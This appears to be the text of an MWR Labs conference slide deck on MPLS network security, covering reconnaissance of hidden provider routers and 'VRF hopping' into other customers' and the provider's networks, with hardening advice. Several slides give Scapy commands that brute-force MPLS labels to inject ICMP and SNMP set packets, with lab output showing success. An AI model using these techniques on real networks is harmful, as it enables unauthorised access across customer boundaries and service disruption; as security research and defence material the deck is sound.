  • 6. Labs.mwrinfosecurity.com | © MWR Labs 8 MPLS Terms What do we need to know? • Virtual Routing and Forwarding (VRF) • Allows multiple instances of a routing table to exist and operate simultaneously on the same physical device. • VRF Layer 3 segmentation is analogous to VLAN Layer 2 segmentation. • VRFs are only locally significant to the router.
  • 7. Labs.mwrinfosecurity.com | © MWR Labs 10 MPLS Topology Customer Site A Customer Site B Service Provider Network
  • 8. Labs.mwrinfosecurity.com | © MWR Labs 11 MPLS Encapsulation How is traffic handled at the ingress edge? • Label Information Base (LIB) Lookup • MPLS Encapsulation • MPLS Header (Layer 2.5) • Label Stack
  • 9. Labs.mwrinfosecurity.com | © MWR Labs 12 MPLS Encapsulation MPLS Header • Layer 2.5
  • 10. Labs.mwrinfosecurity.com | © MWR Labs 13 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
  • 11. Labs.mwrinfosecurity.com | © MWR Labs 14 Retrospection • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015
  • 12. Labs.mwrinfosecurity.com | © MWR Labs 15 • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015 Retrospection
  • 13. Labs.mwrinfosecurity.com | © MWR Labs 16 • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015 Retrospection
  • 14. Labs.mwrinfosecurity.com | © MWR Labs 17 • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015 Retrospection
  • 15. Labs.mwrinfosecurity.com | © MWR Labs 18 • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015 Retrospection
  • 16. Labs.mwrinfosecurity.com | © MWR Labs 19 • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015 Retrospection
  • 17. Labs.mwrinfosecurity.com | © MWR Labs 20 • IP Backbone Security Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002 • MPLS and VPLS Security Enno Rey, ERNW, 2006 • MPLS Security Overview Thorsten Fischer, IRM, 2007 • Hijacking Label Switched Networks in the Cloud Paul Coggin, Dynetics, 2014 • Playing with Labelled Switching Tim Brown, Portcullis Labs, 2015 Retrospection
  • 18. Labs.mwrinfosecurity.com | © MWR Labs 21 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
  • 19. Labs.mwrinfosecurity.com | © MWR Labs 22 MPLS Network Reconnaissance Basic PE Reconnaissance • MAC Address • Management Protocols • LLDP, CDP, MNDP • Routing Protocols • OSPF, IS-IS, etc. • Services • Telnet, SSH, HTTP, SNMP, etc.
  • 20. Labs.mwrinfosecurity.com | © MWR Labs 23 MPLS Network Reconnaissance Concealed Devices and Links • Analysis of the Security of BGP/MPLS IP Virtual Private Networks [RFC-4381] Service providers and end-customers do not normally want their network topology revealed to the outside. […] If an attacker doesn't know the address of a victim, he can only guess the IP addresses to attack.
  • 21. Labs.mwrinfosecurity.com | © MWR Labs 24 MPLS Network Reconnaissance Concealed Devices and Links • Analysis of the Security of BGP/MPLS IP Virtual Private Networks [RFC-4381] This makes it very hard to attack the core, although some functionality such as pinging core routers will be lost. Traceroute across the core will still work, since it addresses a destination outside the core.
  • 22. Labs.mwrinfosecurity.com | © MWR Labs 25 MPLS Network Reconnaissance Concealed Devices and Links • Analysis of the Security of BGP/MPLS IP Virtual Private Networks [RFC-4381] It has to be mentioned specifically that information hiding as such does not provide security. However, in the market this is a perceived requirement.
  • 23. Labs.mwrinfosecurity.com | © MWR Labs 26 MPLS Network Reconnaissance Concealed Devices and Links • IP TTL Propagation • PE devices decrement the TTL from the IP header and copy the value into the MPLS header. • Propagating the TTL value is enabled by default for a large number of vendors. • ICMP Tunnelling • If an ICMP message is generated by an LSR, the ICMP message is carried all the way to the end of the LSP before it is routed back.
  • 24. Labs.mwrinfosecurity.com | © MWR Labs 27 MPLS Network Reconnaissance Service Provider NetworkClient Site A Client Site B Sample Topology* • Basic Service Provider Network • One Provider (P) and two Provider Edge (PE) devices. • Customer Network • Customer Edge (CE) device at each site. 192.168.100.2/30 192.168.101.2/30
  • 25. Labs.mwrinfosecurity.com | © MWR Labs 28 MPLS Network Reconnaissance Service Provider NetworkClient Site A Client Site B 192.168.100.2/30 192.168.101.2/30 root@R1:~# traceroute -n -e 192.168.101.2 traceroute to 192.168.101.2 (192.168.101.2), 30 hops max, 60 byte packets 1 192.168.100.1 51.647 ms 61.218 ms 71.238 ms 2 172.16.0.1 <MPLS:L=16,E=0,S=0,T=1/L=19,E=0,S=1,T=1> 81.074 ms 91.056 ms 101.060 ms 3 172.16.0.6 <MPLS:L=19,E=0,S=1,T=1> 121.041 ms 131.009 ms 140.959 ms 4 192.168.101.2 161.038 ms 170.997 ms 180.984 ms root@R1:~# R1
  • 26. Labs.mwrinfosecurity.com | © MWR Labs 29 MPLS Network Reconnaissance Service Provider NetworkClient Site A Client Site B 192.168.100.2/30 192.168.101.2/30 root@R1:~# traceroute -n -e 192.168.101.2 traceroute to 192.168.101.2 (192.168.101.2), 30 hops max, 60 byte packets 1 192.168.100.1 51.647 ms 61.218 ms 71.238 ms 2 172.16.0.1 <MPLS:L=16,E=0,S=0,T=1/L=19,E=0,S=1,T=1> 81.074 ms 91.056 ms 101.060 ms 3 172.16.0.6 <MPLS:L=19,E=0,S=1,T=1> 121.041 ms 131.009 ms 140.959 ms 4 192.168.101.2 161.038 ms 170.997 ms 180.984 ms root@R1:~# R1
  • 27. Labs.mwrinfosecurity.com | © MWR Labs 30 MPLS Network Reconnaissance Service Provider NetworkClient Site A Client Site B 192.168.100.2/30 192.168.101.2/30 root@R1:~# traceroute -n -e 192.168.101.2 traceroute to 192.168.101.2 (192.168.101.2), 30 hops max, 60 byte packets 1 192.168.100.1 51.647 ms 61.218 ms 71.238 ms 2 172.16.0.1 <MPLS:L=16,E=0,S=0,T=1/L=19,E=0,S=1,T=1> 81.074 ms 91.056 ms 101.060 ms 3 172.16.0.6 <MPLS:L=19,E=0,S=1,T=1> 121.041 ms 131.009 ms 140.959 ms 4 192.168.101.2 161.038 ms 170.997 ms 180.984 ms root@R1:~# R1
  • 28. Labs.mwrinfosecurity.com | © MWR Labs 31 MPLS Network Reconnaissance In a nutshell… Let us consider a scenario with IP TTL Propagation and ICMP Tunnelling disabled as per best practices.
  • 29. Labs.mwrinfosecurity.com | © MWR Labs 32 MPLS Network Reconnaissance In a nutshell… Let us consider a scenario with IP TTL Propagation and ICMP Tunnelling disabled as per best practices.
  • 30. Labs.mwrinfosecurity.com | © MWR Labs 33 MPLS Network Reconnaissance How many LSRs are there? • Basic enumeration trick reveals the number of intermediate service provider devices along the LSP. • Generate a series of ICMP echo requests encapsulated in MPLS with sequentially incrementing TTL values. • Label values may vary within the reserved range. • Prerequisite is for a PE to process MPLS encapsulated traffic received on a customer interface.
  • 31. Labs.mwrinfosecurity.com | © MWR Labs 34 MPLS Network Reconnaissance Service Provider NetworkClient Site A Client Site B 192.168.100.2/30 192.168.101.2/30 >>> load_contrib('mpls') >>> a = Ether(src = '08:00:27:12:27:13', dst = ‘XX:XX:XX:a3:7b:01') >>> b = MPLS(label = 0, ttl = range(0, 4)) >>> c = IP(src = '192.168.100.2', dst = '192.168.101.2') >>> d = ICMP() >>> sendp(a/b/c/d) ... Sent 4 packets. >>> R1
  • 32. Labs.mwrinfosecurity.com | © MWR Labs 35 root@R1:~# tcpdump -ntr traffic.pcap reading from file modified.pcap, link-type EN10MB (Ethernet) MPLS (label 0, exp 0, [S], ttl 0) IP 192.168.100.2 > 192.168.101.2: ICMP echo request, id 0, seq 0, length 8 IP 192.168.100.1 > 192.168.100.2: ICMP time exceeded in-transit, length 36 MPLS (label 0, exp 0, [S], ttl 1) IP 192.168.100.2 > 192.168.101.2: ICMP echo request, id 0, seq 0, length 8 IP 192.168.100.1 > 192.168.100.2: ICMP time exceeded in-transit, length 36 MPLS (label 0, exp 0, [S], ttl 2) IP 192.168.100.2 > 192.168.101.2: ICMP echo request, id 0, seq 0, length 8 IP 192.168.100.1 > 192.168.100.2: ICMP time exceeded in-transit, length 36 MPLS (label 0, exp 0, [S], ttl 3) IP 192.168.100.2 > 192.168.101.2: ICMP echo request, id 0, seq 0, length 8 root@R1:~# MPLS Network Reconnaissance
  • 33. Labs.mwrinfosecurity.com | © MWR Labs 36 MPLS Network Reconnaissance 192.168.100.2/30 192.168.101.2/30 How about LSR/LER IP addresses? • The number of intermediate devices along the LSP is mostly irrelevant anyway. • Revealing the LSR/LER IP addresses would be a lot more beneficial to an attacker.
  • 34. Labs.mwrinfosecurity.com | © MWR Labs 37 MPLS Network Reconnaissance 192.168.100.2/30 192.168.101.2/30 172.16.0.0/30 172.16.0.4/30 .2 .1 .5 .6 root@R1:~# traceroute -n 192.168.101.2 traceroute to 192.168.101.2 (192.168.101.2), 30 hops max, 60 byte packets 1 192.168.100.1 0.417 ms 0.289 ms 0.274 ms 2 192.168.101.2 32.230 ms 43.308 ms 54.030 ms root@R1:~# R1
  • 35. Labs.mwrinfosecurity.com | © MWR Labs 39 MPLS Network Reconnaissance 192.168.100.2/30 192.168.101.2/30 172.16.0.0/30 172.16.0.4/30 .2 .1 .5 .6 root@R1:~# hping3 -G --icmp -c 1 192.168.101.2 HPING 192.168.101.2 (eth0 192.168.101.2): icmp mode set, 28 headers + 0 data bytes len=68 ip=192.168.101.2 ttl=254 id=13178 icmp_seq=0 rtt=30.8 ms RR: 1.2.3.4 172.16.0.1 192.168.101.1 192.168.101.2 192.168.101.2 172.16.0.6 192.168.100.1 --- 192.168.101.2 hping statistic --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 30.8/30.8/30.8 ms root@R1:~#
  • 36. Labs.mwrinfosecurity.com | © MWR Labs 40 MPLS Network Reconnaissance 192.168.100.2/30 192.168.101.2/30 172.16.0.0/30 172.16.0.4/30 .2 .1 .5 .6 root@R1:~# hping3 -G --icmp -c 1 192.168.101.2 HPING 192.168.101.2 (eth0 192.168.101.2): icmp mode set, 28 headers + 0 data bytes len=68 ip=192.168.101.2 ttl=254 id=13178 icmp_seq=0 rtt=30.8 ms RR: 1.2.3.4 172.16.0.1 192.168.101.1 192.168.101.2 192.168.101.2 172.16.0.6 192.168.100.1 --- 192.168.101.2 hping statistic --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 30.8/30.8/30.8 ms root@R1:~#
  • 37. Labs.mwrinfosecurity.com | © MWR Labs 41 MPLS Network Reconnaissance Remember IP Record Route? • IP option used to trace the route an IP packet takes through the network. • Router is expected to insert its IP address as configured on its egress interface. • Label Switching Routers (LSR) process traffic based on labels in the MPLS header. • The question remains as to why a number of implementations honor the IP options field.
  • 38. Labs.mwrinfosecurity.com | © MWR Labs 42 MPLS Network Reconnaissance 192.168.100.2/30 192.168.101.2/30 172.16.0.0/30 172.16.0.4/30 .2 .1 .5 .6 Now what? • Sending traffic directly to an LSR interface. • Assume point-to-point links and derive the internal IP address of an adjacent PE device. • There is no way for an intermediate LSR to reply due to lack of routing information. • Remember that a VRF has only local significance.
  • 39. Labs.mwrinfosecurity.com | © MWR Labs 43 MPLS Network Reconnaissance 192.168.100.2/30 192.168.101.2/30 172.16.0.0/30 172.16.0.4/30 .2 .1 .5 .6 root@R1:~# ping -c 3 172.16.0.2 PING 172.16.0.2 (172.16.0.2) 56(84) bytes of data. 64 bytes from 172.16.0.2: icmp_seq=1 ttl=64 time=1.31 ms 64 bytes from 172.16.0.2: icmp_seq=2 ttl=64 time=0.537 ms 64 bytes from 172.16.0.2: icmp_seq=3 ttl=64 time=0.545 ms --- 172.16.0.2 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2002ms rtt min/avg/max/mdev = 0.537/0.942/1.744/0.567 ms root@R1:~# R1
  • 40. Labs.mwrinfosecurity.com | © MWR Labs 44 MPLS Network Reconnaissance Food for thought? • Test results varied per implementation. • One vendor was unaffected. • Several vendors were affected by one or more than one of these weaknesses. • One vendor was affected by all of these. • What about a heterogeneous network?
  • 41. Labs.mwrinfosecurity.com | © MWR Labs 45 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
  • 42. Labs.mwrinfosecurity.com | © MWR Labs 46 VRF Hopping What is VRF hopping? • Unauthorised Inter-VRF communication. • Breaking out of our VRF and injecting traffic into other customers’ VRFs. • Potentially allowing for injecting into a service provider’s management VRF. • It is usually achieved by sending pre-labelled traffic to a Provider Edge (PE) device. • It is possible on a misconfigured PE to CE link. • Potentially complicated in case of overlapping address spaces across the VRFs.
  • 43. Labs.mwrinfosecurity.com | © MWR Labs 48 VRF Hopping Attacking MPLS Clients • Customer traffic flows within dedicated VRFs. • There is no Inter-VRF communication, unless route leaking is explicitly configured. • Global routing table into a VRF and vice versa. • VRF to VRF. • Attacking other clients implies Inter-VRF traffic flow. • Successful VRF hopping attack results in reaching another client’s CE device.
  • 44. Labs.mwrinfosecurity.com | © MWR Labs 49 Attacking MPLS Clients • Customer A (VRF A) • Site 1 (R1): 192.168.100.2/30 • Site 2 (R2): 192.168.101.2/30 • Customer B (VRF B) • Site 1 (R3): 192.168.200.2/30 • Site 2 (R4): 192.168.201.2/30 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 R1 R2 R3 R4
  • 45. Labs.mwrinfosecurity.com | © MWR Labs 50 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 root@R1:~# ping -c 3 192.168.201.2 PING 192.168.201.2 (192.168.201.2) 56(84) bytes of data. --- 192.168.201.2 ping statistics --- 3 packets transmitted, 0 received, 100% packet loss, time 1999ms root@R1:~# R1 R2 R3 R4
  • 46. Labs.mwrinfosecurity.com | © MWR Labs 51 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 R4# debug ip icmp ICMP packet debugging is on R4# R1 R2 R3 R4
  • 47. Labs.mwrinfosecurity.com | © MWR Labs 52 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 >>> load_contrib('mpls') >>> a = Ether(src = '08:00:27:12:27:13', dst = ‘XX:XX:XX:a3:7b:01') >>> b = MPLS(ttl = 64, label = range(1000, 1500)) >>> c = IP(src = '192.168.100.2', dst = '192.168.201.2') >>> d = ICMP() >>> sendp(a/b/c/d) ... Sent 500 packets. >>> R1 R2 R3 R4
  • 48. Labs.mwrinfosecurity.com | © MWR Labs 53 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 >>> load_contrib('mpls') >>> a = Ether(src = '08:00:27:12:27:13', dst = ‘XX:XX:XX:a3:7b:01') >>> b = MPLS(ttl = 64, label = range(1000, 1500)) >>> c = IP(src = '192.168.100.2', dst = '192.168.201.2') >>> d = ICMP() >>> sendp(a/b/c/d) ... Sent 500 packets. >>> R1 R2 R3 R4 R1 R4
  • 49. Labs.mwrinfosecurity.com | © MWR Labs 54 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 R4# *Mar 1 00:29:34.383: ICMP: echo reply sent, src 192.168.201.2, dst 192.168.100.2 *Mar 1 00:29:34.387: ICMP: echo reply sent, src 192.168.201.2, dst 192.168.100.2 R4# R1 R2 R3 R4
  • 50. Labs.mwrinfosecurity.com | © MWR Labs 55 192.168.100.2/30 192.168.101.2/30 192.168.201.2/30192.168.200.2/30 R4# *Mar 1 00:29:34.383: ICMP: echo reply sent, src 192.168.201.2, dst 192.168.100.2 *Mar 1 00:29:34.387: ICMP: echo reply sent, src 192.168.201.2, dst 192.168.100.2 R4# R1 R2 R3 R4 R1
  • 51. Labs.mwrinfosecurity.com | © MWR Labs 56 VRF Hopping Attacking Service Provider Devices • MPLS core devices should never be directly reachable from customers. • LSRs are usually accessed from within a dedicated management VRF. • Injecting traffic with certain labels may allow for reaching an LSR.
  • 52. Labs.mwrinfosecurity.com | © MWR Labs 57 192.168.100.2/30 root@R1:~# ping -c 3 172.16.0.1 PING 172.16.0.1 (172.16.0.1) 56(84) bytes of data. --- 172.16.0.1 ping statistics --- 3 packets transmitted, 0 received, 100% packet loss, time 2015ms root@R1:~# R1 R2 R3 R4 P 172.16.0.0/30 172.16.0.4/30 .1 .5
  • 53. Labs.mwrinfosecurity.com | © MWR Labs 58 192.168.100.2/30 <P> debugging ip icmp <P> terminal monitor The current terminal is enabled to display logs. <P> terminal debugging The current terminal is enabled to display debugging logs. <P> R1 R2 R3 R4 P 172.16.0.0/30 172.16.0.4/30 .1 .5
  • 54. Labs.mwrinfosecurity.com | © MWR Labs 59 192.168.100.2/30 R1 R2 R3 R4 P 172.16.0.0/30 172.16.0.4/30 .1 .5 >>> load_contrib('mpls') >>> a = Ether(src = '08:00:27:12:27:13', dst = ‘XX:XX:XX:a3:7b:01') >>> b = MPLS(ttl = 64, label = range(1000, 1500)) >>> c = IP(src = '192.168.100.2', dst = '172.16.0.1') >>> d = ICMP() >>> sendp(a/b/c/d) ... Sent 500 packets. >>>
  • 55. Labs.mwrinfosecurity.com | © MWR Labs 60 192.168.100.2/30 R2R1 <P> *Oct 20 16:24:09:891 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Input: ICMP Packet: src = 192.168.100.2, dst = 172.16.0.1 type = 8, code = 0 (echo) *Oct 20 16:24:09:891 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Output: ICMP Packet: src = 172.16.0.1, dst = 192.168.100.2 type = 0, code = 0 (echo-reply) *Oct 20 16:24:09:894 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Input: ICMP Packet: src = 192.168.100.2, dst = 172.16.0.1 type = 8, code = 0 (echo) *Oct 20 16:24:09:894 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Output: ICMP Packet: src = 172.16.0.1, dst = 192.168.100.2 type = 0, code = 0 (echo-reply) <P>
  • 56. Labs.mwrinfosecurity.com | © MWR Labs 61 192.168.100.2/30 R2R1 <P> *Oct 20 16:24:09:891 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Input: ICMP Packet: src = 192.168.100.2, dst = 172.16.0.1 type = 8, code = 0 (echo) *Oct 20 16:24:09:891 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Output: ICMP Packet: src = 172.16.0.1, dst = 192.168.100.2 type = 0, code = 0 (echo-reply) *Oct 20 16:24:09:894 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Input: ICMP Packet: src = 192.168.100.2, dst = 172.16.0.1 type = 8, code = 0 (echo) *Oct 20 16:24:09:894 2015 P SOCKET/7/ICMP: Time(s):1445358249 ICMP Output: ICMP Packet: src = 172.16.0.1, dst = 192.168.100.2 type = 0, code = 0 (echo-reply) <P> R1 R1
  • 57. Labs.mwrinfosecurity.com | © MWR Labs 62 VRF Hopping Attack Limitations • VLAN hopping limitations apply, i.e. one-way communication. • It is only useful against stateless protocols, e.g. SNMP. • Success or failure of attack is uncertain due to lack of response. • Label ranges will vary based on network size and vendor equipment. • Attacker can only reach a service provider LSR/LER or another customer’s CE.*
  • 58. Labs.mwrinfosecurity.com | © MWR Labs 63 VRF Hopping Improvements How about two-way communication? • There is always room for configuration- and design- specific attacks. • SNMP attacks require poorly configured CE devices. • Managed vs. Unmanaged Services. • Customer managed CE devices are most likely less hardened.
  • 59. Labs.mwrinfosecurity.com | © MWR Labs 64 VRF Hopping Improvements What do we need? • Configuration Prerequisites • SNMP write access enabled on a CE device. • Service accessible over a CE to PE link. • Low complexity SNMP community string. • Attack Scenario • VRF hopping as previously demonstrated. • SNMP community string guesswork. • Force the CE to encapsulate certain traffic in MPLS. • Configure an MPLS static binding rule.
  • 60. Labs.mwrinfosecurity.com | © MWR Labs 65 192.168.100.2/30 192.168.201.2/30 R1 R2 R3 R4 >>> a = Ether(src = '08:00:27:12:27:13', dst = ‘XX:XX:XX:a3:7b:01') >>> b = MPLS(ttl = 64, label = range(1000, 1500)) >>> c = IP(src = '192.168.100.2', dst = '192.168.201.2') >>> d = UDP(sport = 161, dport = 161) >>> e = SNMP(community = '...', PDU = SNMPset(varbindlist = [SNMPvarbind(oid = ASN1_OID('...'), value = ...)])) >>> sendp(a/b/c/d/e) ... Sent 500 packets. >>>
  • 61. Labs.mwrinfosecurity.com | © MWR Labs 66 VRF Hopping Improvements What can go wrong? • SNMP hurdles are highly likely. • The interesting MIBs may be read-only. • Picking up the wrong OID values. • Denial of Service due to introducing CE misconfigurations.
  • 62. Labs.mwrinfosecurity.com | © MWR Labs 73 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
  • 63. Labs.mwrinfosecurity.com | © MWR Labs 74 MPLS Hardening MPLS Network Security Recommendations • Disable IP TTL propagation at the edge of the MPLS domain, i.e. on the ingress LSRs. • Disable ICMP tunnelling throughout the LSPs. • Disable management protocols and unwanted services on the customer facing interfaces. • Enable Generalised TTL Security Mechanism (GTSM) [RFC-3682]. • Follow the recommendations as specified in Security Framework for MPLS and GMPLS Networks [RFC-5920].
  • 64. Labs.mwrinfosecurity.com | © MWR Labs 75 MPLS Hardening General Guidelines • Assume presence of malicious or compromised clients. • Restrictive ACLs for accessing the LSR devices. • Secure device management protocols, e.g. SNMPv3, HTTPS, SSH. • Routing protocol authentication. • MPLS signalling protocol authentication. • Centralised AAA services and logging. • Secure configuration baseline. • Consistent configurations across the network. • Configuration files version control.
  • 65. Labs.mwrinfosecurity.com | © MWR Labs 76 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
  • 66. Labs.mwrinfosecurity.com | © MWR Labs 77 Future Research What else is there to look at? • VRF Hopping Attack Scenarios • UDP Services • MPLS Signalling Protocols • Label Distribution Protocol (LDP) • Resource Reservation Protocol (RSVP) • More Protocol Fuzzing
  • 67. Labs.mwrinfosecurity.com | © MWR Labs 78 Acknowledgements • MWR Labs • Alex Plaskett • John Fitzpatrick • Harry Grobbelaar • Willie Victor • Pavel Stefanov (CCIE R&S, CCIE Service Provider)
  • 68. Labs.mwrinfosecurity.com | © MWR Labs 79 Questions • Feedback • @munmap • georgi.geshev@mwrinfosecurity.com